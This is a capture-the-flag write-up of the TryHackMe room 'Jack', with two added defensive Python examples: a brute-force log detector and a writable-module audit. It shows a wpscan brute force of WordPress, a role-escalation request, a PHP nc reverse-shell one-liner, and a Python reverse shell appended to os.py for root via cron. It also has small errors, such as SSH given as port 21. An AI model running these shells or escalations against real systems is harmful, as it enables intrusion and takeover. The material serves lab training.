TryHackme — Jack Write up

Shamsher khan
5 min read · May 21, 2021

By Shamsher khan. This is a writeup of the TryHackMe room “Jack”.

https://tryhackme.com/room/jack

Setup

First, we connect to the VPN. If you are not familiar with the process, go through this room first.

Once we are connected we deploy the machine (note that the room description asks you to add jack.thm to /etc/hosts):

Let’s add jack.thm to the /etc/hosts file; you can use leafpad or vim to edit this file.

Enumeration

nmap -T4 -sS -sC -sV jack.thm

We have two open ports: SSH (21) and HTTP (80). Without a username and password we can’t log in through SSH, so we enumerate port 80: open a browser and visit

http://jack.thm

From the nmap results we can see /wp-admin, which takes us to the WordPress login form, but we don’t have any credentials yet.

Using WPScan

wpscan --url jack.thm -e u

We can see that XML-RPC is enabled, which gives us a few vulnerabilities; see the blog post here by Bilal Rizwan.

Users Found

With WPScan we know that the server is running WordPress 5.3.2 with XML-RPC enabled and has three users. With this information we move on to exploiting WordPress.

Brute Force WordPress Login

We put all three usernames into a text file and run wpscan against the login with the rockyou wordlist:

echo user1 > users.txt; echo user2 >> users.txt; echo user3 >> users.txt
wpscan -U users.txt -P rockyou.txt --url http://jack.thm

We have a valid username and password; log in to WordPress.
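From the defender’s side, the XML-RPC and wp-login.php brute force above is loud in the web server log. The following is an added example, not part of the original writeup: a small detector run over constructed Apache combined-format lines (the IPs, timestamps and user agents are made up) that flags any client posting repeatedly to the two WordPress authentication endpoints.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not from the room): one client hammering
# xmlrpc.php and wp-login.php, one ordinary visitor who logs in once.
SAMPLE_LOG = """\
10.0.0.5 - - [21/May/2021:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WPScan v3.8.0"
10.0.0.5 - - [21/May/2021:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "WPScan v3.8.0"
10.0.0.5 - - [21/May/2021:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8.0"
10.0.0.5 - - [21/May/2021:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8.0"
10.0.0.5 - - [21/May/2021:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.0"
10.0.0.9 - - [21/May/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 8210 "-" "Mozilla/5.0"
10.0.0.9 - - [21/May/2021:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def find_wp_bruteforce(log_text, threshold=3):
    """Count POSTs per client to the WordPress authentication endpoints.

    On wp-login.php a 200 means the login form was re-rendered (failed attempt)
    and a 302 means a successful login. Every client with at least `threshold`
    authentication POSTs is reported with its failure count and user agents.
    """
    per_ip = defaultdict(lambda: {"posts": 0, "failed_logins": 0, "ua": set()})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or rec["method"] != "POST":
            continue
        if rec["path"].split("?")[0] not in ("/xmlrpc.php", "/wp-login.php"):
            continue
        entry = per_ip[rec["ip"]]
        entry["posts"] += 1
        entry["ua"].add(rec["ua"])
        if rec["path"].startswith("/wp-login.php") and rec["status"] == "200":
            entry["failed_logins"] += 1
    return {ip: e for ip, e in per_ip.items() if e["posts"] >= threshold}
```

In a real deployment the same counting is done per time window; blocking or rate-limiting xmlrpc.php when it is not needed removes the endpoint wpscan abuses here.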

At this point I had to take a hint, because there were no plugins found via wpscan and this user wasn’t an admin user, so we use searchsploit:

searchsploit Plugin User role editor

Download the exploit:

searchsploit -m 44595

This exploit tells us to send a modified POST request that specifies the user’s privileges via ure_other_roles as part of updating a user’s profile.

Open Burp Suite, set the proxy in your browser and turn on intercept:

We can see the section of the POST request that may be vulnerable:

Now compare this to the Ruby module we downloaded using searchsploit: every parameter in the POST request is set except for ure_other_roles:

So let’s try adding this to our request and see if it works:

&ure_other_roles=administrator

We modify our request and click Forward in Burp:

When we forward our request, we have administrator access to WordPress, and under the Plugins tab we can see the vulnerable User Role Editor plugin, version 4.24:

Getting a Shell

Go to the plugin editor and paste this one-liner into Akismet.php (replace 192.168.X.X with your own IP):

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4444 >/tmp/f") ?>

Now click on Update File.

Now click on Activate to get a reverse shell.

We start our listener first.

We have the user www-data, which has low privileges. We need to escalate to the user jack. Checking the reminder.txt file, we notice something related to backups, so we do some enumeration and find a backups folder with an SSH key which we can use to log in as jack.

List of files under /var/backups

We can log in as user jack after changing the permissions of id_rsa to 600.

Then we try SSH:

ssh -i id_rsa jack@jack.thm

User.txt

Privilege Escalation to Root

Download pspy64:

wget https://github.com/wildkindcc/Exploitation/blob/master/00.PostExp_Linux/pspy/pspy64

Transfer this file into jack’s /tmp folder to run it.

Using pspy to monitor the running processes, we notice that root has a cron job running every minute. The script is located at /opt/statuscheck/checker.py.

The contents of the script show that it imports the Python module os.

With all the information we have discovered, it’s time for some further enumeration. We notice that the user jack is part of the family group, which has the ability to write to any file under the /usr/lib/python2.7/ directory. This is good because the os module lives in that directory, so our user jack has write access to that module.

www-data@jack:/home/jack$ id jack
id jack
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)
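The root cause here is a library directory writable by an unprivileged group combined with a root cron job that imports from it. As an added example, not code from the room or the writeup, the audit below finds exactly that pairing: it lists group- or world-writable .py files under a library directory and intersects them with the modules a given privileged script imports. The fixture directory, file modes and the stand-in checker script are constructed for the demo.

```python
import ast
import os
import stat
import tempfile

# Constructed stand-in for a root cron script such as /opt/statuscheck/checker.py.
CHECKER_SRC = "import os\nimport urllib2\nos.system('curl -s http://localhost')\n"

def writable_by_others(path):
    """Which non-owners can modify `path`: a subset of {'group', 'world'}."""
    mode = os.stat(path).st_mode
    return {name for bit, name in ((stat.S_IWGRP, "group"), (stat.S_IWOTH, "world")) if mode & bit}

def audit_lib(lib_dir):
    """Map module name -> how it is writable, for every .py under lib_dir that a
    group or the world can write. Root importing such a module runs whatever
    was appended to it, which is the weakness this room turns into a root shell."""
    findings = {}
    for root, _dirs, files in os.walk(lib_dir):
        for name in files:
            if not name.endswith(".py"):
                continue
            ways = writable_by_others(os.path.join(root, name))
            if ways:
                findings[name[:-3]] = sorted(ways)
    return findings

def imported_modules(source):
    """Top-level module names a script imports, i.e. what the cron job would load."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            names.add(node.module.split(".")[0])
    return names

def modules_at_risk(lib_dir, script_source):
    """Writable modules that the privileged script actually imports."""
    writable = audit_lib(lib_dir)
    return {m: writable[m] for m in imported_modules(script_source) if m in writable}

def demo():
    """Constructed fixture: a fake lib dir where os.py is group-writable (mode 664)."""
    lib = tempfile.mkdtemp(prefix="pylib-audit-")
    for name, mode in (("os.py", 0o664), ("socket.py", 0o644), ("pty.py", 0o666)):
        path = os.path.join(lib, name)
        with open(path, "w") as fh:
            fh.write("# constructed stub\n")
        os.chmod(path, mode)
    return modules_at_risk(lib, CHECKER_SRC)
```

On a real host you would call modules_at_risk("/usr/lib/python2.7", open("/opt/statuscheck/checker.py").read()); the fix is to restore owner-only write on the library tree (chmod -R go-w) and to remove the group grant that made it writable.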

To exploit this, we edit the /usr/lib/python2.7/os.py module and add the following reverse shell at the very end (dup2 is already defined in os.py, so it is used unqualified; replace 192.168.X.X with your IP):

import socket
import pty
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.X.X", 4444))
dup2(s.fileno(), 0)
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
s.close()

We start a listener, wait 2 minutes for the cron job to run, and get a root shell.

Thanks to the machine creator/s for this challenge.
